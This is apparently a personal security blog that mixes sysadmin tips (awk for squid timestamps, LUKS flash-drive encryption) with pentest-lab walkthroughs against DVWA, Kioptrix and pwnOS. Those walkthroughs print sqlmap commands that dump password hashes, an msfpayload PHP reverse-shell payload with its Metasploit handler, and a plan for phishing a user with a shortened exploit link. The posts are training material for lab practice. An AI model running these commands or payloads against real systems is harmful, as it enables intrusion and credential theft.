Linux Time (costing me time!)

Recently I had to *quickly* analyse some squid logs on a compromised box, fortunately for me the attacker didn't do any post exploitation log clearance so there was plenty for me to look at. :-)

Anyway, this particular squid setup was printing logs with the linux time stamp, for those of you who don't know about linux/unix time stamps, they show the number of seconds since 00:00, January 1, 1970 GMT, referred to as the Epoch.

I'm not one for using GUI's to do such a simple task so I used a bit of awk, it's very simple.

Here's an extract from some other squid logs, that shows the system time in column 1:

 [root@gateway ~]# tail -f /var/log/squid/access.log
1320259150.490      1 10.50.60.193 TCP_MEM_HIT/200 811 GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGPvRCiCE0goqBf-oAgA_MgX7qAIADw - NONE/- application/vnd.google.safebrowsing-chunk
1320259167.644    407 10.44.254.109 TCP_MISS/200 4854 GET http://twitter.com/account/available_features - DIRECT/199.59.149.230 text/javascript
1320259173.477     84 10.44.254.213 TCP_MISS/200 543 GET http://go.sky.com/vod/viewless/currentTime.do - DIRECT/2.17.237.52 text/plain
1320259231.937    472 10.44.254.170 TCP_MISS/200 759 GET http://search.twitter.com/search.json? - DIRECT/199.59.148.201 application/json
1320259232.013    356 10.44.254.170 TCP_MISS/200 744 GET http://search.twitter.com/search.json? - DIRECT/199.59.148.201 application/json
1320259289.600    388 10.44.254.109 TCP_MISS/200 1936 GET http://api.twitter.com/1/trends/23424975.json? - DIRECT/199.59.148.20 application/json
1320259322.271    396 10.44.254.170 TCP_MISS/200 2021 GET http://www.google.com/reader/api/0/unread-count? - DIRECT/74.125.230.145 text/javascript
1320259347.605    393 10.44.254.109 TCP_MISS/200 4854 GET http://twitter.com/account/available_features - DIRECT/199.59.148.82 text/javascript
1320259369.710    191 10.44.254.170 TCP_MISS/200 728 GET http://query.yahooapis.com/v1/public/yql? - DIRECT/87.248.113.166 application/json
1320259370.535   1016 10.44.254.170 TCP_MISS/200 1349 GET http://weather.yahooapis.com/forecastjson? - DIRECT/87.248.122.181 application/json

Now with a bit of awk we can add a human readable time-stamp next to the epoch time-stamp:

 [root@gateway ~]# tail -f /var/log/squid/access.log | awk '{ print strftime("%y-%m-%d %H:%M:%S"), $0; }'
11-11-02 18:45:36 1320259435.980    916 10.44.254.186 TCP_MISS/200 32393 GET http://twitter.com/statuses/user_timeline/d3m0n35.json - DIRECT/199.59.149.198 application/json
11-11-02 18:45:36 1320259453.347    116 10.44.254.213 TCP_MISS/200 710 POST http://safebrowsing.clients.google.com/safebrowsing/downloads? - DIRECT/209.85.143.101 application/vnd.google.safebrowsing-update
11-11-02 18:45:36 1320259453.438     53 10.44.254.213 TCP_MEM_HIT/200 527 GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchABGP6QBSD-kAUyBX5IAQAB - NONE/- application/vnd.google.safebrowsing-chunk
11-11-02 18:45:36 1320259453.503     55 10.44.254.213 TCP_MISS/200 951 GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGPvRCiCE0goqBQGpAgAPMgX7qAIAPw - DIRECT/209.85.147.139 application/vnd.google.safebrowsing-chunk
11-11-02 18:45:36 1320259521.453     80 10.44.254.213 TCP_REFRESH_HIT/304 550 GET http://images.apple.com/main/rss/hotnews/hotnews.rss - DIRECT/77.109.169.163 application/xml
11-11-02 18:45:36 1320259521.489    116 10.44.254.213 TCP_MISS/200 51415 GET http://news.google.com/? - DIRECT/74.125.230.128 application/xml
11-11-02 18:45:36 1320259522.144    891 10.44.254.213 TCP_MISS/304 549 GET http://techie-buzz.com/how-to/uninstall-programs-on-mac.html/feed - DIRECT/72.14.188.242 -
11-11-02 18:45:36 1320259527.646    421 10.44.254.109 TCP_MISS/200 4854 GET http://twitter.com/account/available_features - DIRECT/199.59.148.10 text/javascript
11-11-02 18:45:36 1320259532.430    404 10.44.254.170 TCP_MISS/200 743 GET http://search.twitter.com/search.json? - DIRECT/199.59.148.201 application/json
11-11-02 18:45:36 1320259532.531    555 10.44.254.170 TCP_MISS/200 2095 GET http://search.twitter.com/search.json? - DIRECT/199.59.148.201 application/json

So what's this awk syntax doing?

  awk '{ print strftime("%y-%m-%d %H:%M:%S"), $0; }' 

The logs are piped to awk, awk then processes the input with the 'strftime' flag which formats the timestamp according to your requirements, in this case:

 %y for year-%m for month-%d for day then %H for hour:%M for minute:%S for second 

The last piece of the syntax is the $0 variable that tells awk to print every subsequent line.

Linux Encrypted Flash Drive - LUKS

So you pull your bunch of keys out of your pocket and feel for your flash disk, you don't feel it. You look frantically over your keyring and its gone. Were the contents or the partition encrypted?

Encrypt your Key in Linux

This has been tested in Ubuntu 11.10 and for the purposes of the demonstration the partition is /dev/sdb1 - please make sure this is the correct partition for your Flash key, DaF will NOT be held responsible for lost data!

Were using 256 bit Luksformat, which is a good standard, but make sure you use a pass phrase thats at least 12 characters long, that doesn't contain dictionary words but does contain characters, numbers and symbols.

First of all, make a backup of the contents of your key.

Then open your favorite terminal emulator and do the following:

 mac@pentest:~$ sudo umount /dev/sdb1

 mac@pentest:~$ sudo cryptsetup luksFormat /dev/sdb1

This will present you with the following:

WARNING!
========
This will overwrite data on /dev/sdb1 irrevocably.

Are you sure? (Type uppercase yes):

You should then answer (in UPPERCASE):

 YES

You'll be prompted for a pass phrase:

 Enter LUKS passphrase:

Verify your pass phrase

 Verify passphrase:

Next you'll need to open the encrypted wrapper to format the drive:

 mac@pentest:~$ sudo cryptsetup luksOpen /dev/sdb1 EncryptedFlashDisk

Now we need to format the drive and choose a drive label for it, in my case it will be EncryptedFlashDisk:

 mac@pentest:~$ sudo mkfs.vfat /dev/mapper/EncryptedFlashDisk

The output will look similar to this, you'll get some output like below, but don't worry:

mkfs.vfat 3.0.9 (31 Jan 2010)
unable to get drive geometry, using default 255/63

Thats it the next time you plug in the drive you'll be prompted for a passphrase:

Encrypted Flash Disk Password Prompt

Importing Nessus results into Metasploit

Welcome to my small tutorial regarding the usefulness of importing Nessus scan results into Metasploit.

Metasploit now has support for MySQL, Postgre and SQLite - i'll be using SQLite.

Tools:
Metasploitable
Back|Track4
Nessus
Exploit-db

Kioptrix Level 1.1 - Nmap, Metasploit and SQLInject Me

Good evening and welcome to my demonstration of Kioptrix Level 2.

Kioptrix is another vulnerable distro to practice exploiting legally.

Ill kick of the video with a /24 scan of my Lab Lan 10.50.60.0 followed by some SQL injection, some local file inclusion, PHP exploitation, privilege escalation and finally some poc.

I have to say I found this vulnerable distro a lot more challenging than previous distros and want to say a big thanks to Kioptrix.com; so thank you.

DVWA

Brute Force

Brute forcing is a term used to describe what I call a trial and error process of guessing a application or service's user and/or password. There are many tools around to automate this for different applications or services.

The DVWA - Brute Force section has a HTML form where you can practice bruteforce username/password attacks.

I'm going to demonstrate this with FireForce a Mozilla Firefox plugin that can Brute Force attack on GET or POST forms.

Here's a small demo of it in action:

SQL Injection

SQL Injection is a technique used to inject code which will be understood by the database through the database front end of an application; the vulnerability occurs due to a programmer's insecure or non-sanitization of escape characters which are injected through SQL commands or statements in user input fields.

There are many ways to defeat the SQL Injection section of the DVWA. I used SQLMap and Tamper Data FF plugin.

Fire up DVWA, login with admin and password and set the security level to LOW.

Open the SQL Injection section and test for injection with the character 1.

You should see Output below as follows:

ID: 1
First name: admin
Surname: admin

From here you can see the form is vulnerable to SQL Injection.

Now open up Tamper Data FF plugin and click start tamper; click on the SQL Injection link again on the RHS; this will reset the form, now perform the SQL Injection again, enter character 1 and click Submit. Open up Tamper Data and copy the cookie, including 'PHPSESSID' and paste it into kate or some other notepad derivative; also while you have it open make a note of the URL. You'll see why in a second.

Next open a terminal and cd to your SQLMap directory, and start building your syntax, here's what I used.

python sqlmap.py -u 'http://10.50.60.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low' --string="Surname" --dbs

Ill break this down for you:

-u URL of the form page | --cookie the cookie you copied from Tamper Data with the security level | --string this is what SQLMap uses to confirm the query is vaild | --dbs - this enumerates DBMS databases

This should give you output similar to this:

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:38:12

[10:38:13] [INFO] using '/pentest/database/sqlmap/output/10.50.60.116/session' as session file
[10:38:13] [INFO] resuming string match 'Surname' from session file
[10:38:13] [INFO] resuming injection point 'GET' from session file
[10:38:13] [INFO] resuming injection parameter 'id' from session file
[10:38:13] [INFO] resuming injection type 'stringsingle' from session file
[10:38:13] [INFO] resuming 0 number of parenthesis from session file
[10:38:13] [INFO] resuming back-end DBMS 'mysql 5' from session file
[10:38:13] [INFO] testing connection to the target url
[10:38:13] [INFO] testing for parenthesis on injectable parameter
[10:38:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL 5
[10:38:13] [INFO] fetching database names
[10:38:13] [INFO] fetching number of databases
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 3
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': information_schema
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': dvwa
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': mysql
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[10:38:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.50.60.116'

[*] shutting down at: 10:38:13

Brilliant! - Here you can clearly see you have enumerated the database names, dvwa, information_schema and mysql! Now lets see if we can get some usernames and passwords?
Here's the syntax I used:

python sqlmap.py -u 'http://10.50.60.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low' --string="Surname" --users --password

The only difference here is:

 --users which enumerates DBMS users and --passwords which does the same with password hashes

You should get output similar to this:

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:39:09

[10:39:10] [INFO] using '/pentest/database/sqlmap/output/10.50.60.116/session' as session file
[10:39:10] [INFO] resuming string match 'Surname' from session file
[10:39:10] [INFO] resuming injection point 'GET' from session file
[10:39:10] [INFO] resuming injection parameter 'id' from session file
[10:39:10] [INFO] resuming injection type 'stringsingle' from session file
[10:39:10] [INFO] resuming 0 number of parenthesis from session file
[10:39:10] [INFO] resuming back-end DBMS 'mysql 5' from session file
[10:39:10] [INFO] testing connection to the target url
[10:39:10] [INFO] testing for parenthesis on injectable parameter
[10:39:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL 5
[10:39:10] [INFO] fetching database users
[10:39:10] [INFO] fetching number of database users
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 4
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'localhost'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'dojo-vm'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'127.0.0.1'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:39:10] [INFO] fetching database users password hashes
[10:39:10] [INFO] fetching number of password hashes for user 'root'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 1
[10:39:10] [INFO] fetching password hashes for user 'root'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[10:39:10] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 1
[10:39:10] [INFO] fetching password hashes for user 'debian-sys-maint'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': *9FAA9B6E006E3CE7833F3C3C4C97B8628A017CDC
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *9FAA9B6E006E3CE7833F3C3C4C97B8628A017CDC
[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[10:39:10] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.50.60.116'

[*] shutting down at: 10:39:10

Excellent! - Now you have the password hashes for root and debian-sys-main! You can now use your favourite password cracker to decrypt the passwords from the hashes.

Here's a short video showing how I did it:

CSRF

First of all I'd like to describe a Cross site request forgery; this is not a new thing and is a technique that has been around for many years; its also known as session riding in the black hat world. A CSRF is basically a set of commands spoofed to look like they are coming from a "trusted" user. Unlike, what I like to call it's Cousin; the XSS or Cross Site Script as it exploits the trust that a site has in a user's browser rather than exploiting the trust a user has for a particular site.

Tonight I will be attacking the CSRF Section of the DVWA.

I'll be using Firefox, FireBug, FoxyProxy, OWASP's CSRFTester and good ol' Kate all available in the awesome Back|Track4.

Ill capture a genuine HTTP request to change password, using CSRFTester and FoxyProxy; then edit the HTTP request from GET to POST with Kate - to show the proof of concept, ill then open this edited HTTP request with firefox and forge a password request from the Web Application.

During the password change, Ill edit the page with FireBug to show the password change.

Upload Exploitation

In this video I'll create a PHP payload with MsfPayload:

msfpayload php/meterpreter/reverse_tcp LHOST=10.50.60.161 LPORT=8080 R > connectback.php

Also, I'll edit the connectback.php script to remove the "safety latch" the # on line 1.

Then setup Metasploit to handle the reverse connection:

msfconsole

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST 10.50.60.161

set LPORT 8080

exploit

I'll then use the Upload section of DVWA to upload the payload, check out the source and browse to the upload directory http://10.50.60.193/dvwa/hackable/uploads and execute the connectback.php script.

This will give me a session on DVWA has www-data user (apache).

pwnOS with Metasploit, Nmap, Nessus and Exploit-DB.com

pwnOS is a kind of training Ubuntu server image for exploit testing, much like Metasploitable or De-ICE.

There are a couple of vulnerable services that I have discovered so far, one is an out of date Webmin install, the same Debian Weak SSL ciphers used on Metasploitable (slightly annoying :-/ ) and a vulnerable linux kernel.

In the following tutorial I show you how to go from "boot to root" in around 10 - 20 minutes.

Firtsly we'll kick of the show with some information gathering; the image is installed on a box on my 10.50.60.0 network, so we'll start with a full /24 scan. followed by a Nessus vulnerability scan of the said image.

Then we look at exploitation, the some privilege escalation and finally poc (proof of concept).

I found this a lot easier that Metasploitable and was able to get root access in around 2 hours, which did annoy me slightly but still hats off to bond00 at http://heorot.net; its a good training excercise.

httpv://www.youtube.com/watch?v=YL-Jus8S26c

Social engineering with Metasploit and URL shortening

Good evening and welcome to my small demonstration.

Tonight i will exploit a vulnerable Win 7 machine with a 0day.

This exploit will involve social engineering between two users, the attacker demouser1 and the victim demouser2 which I have a RDP session too.

I will kick off the exploit using the Metasploit browser_autopwn module; and control the payload and listener from Metasploit then I'll do some Social Engineering to get the Win 7 user to click a link, which I will have shortened using the Bit.ly URL shortening service, which I'll email to the user using Mozilla Thunderbird.

The payload will be a Java reverse shell and the vulnerability is the ms11_xxx_ie_css_import delivered in a .NET dll.

All of the utilities and features are included in Back|Track4.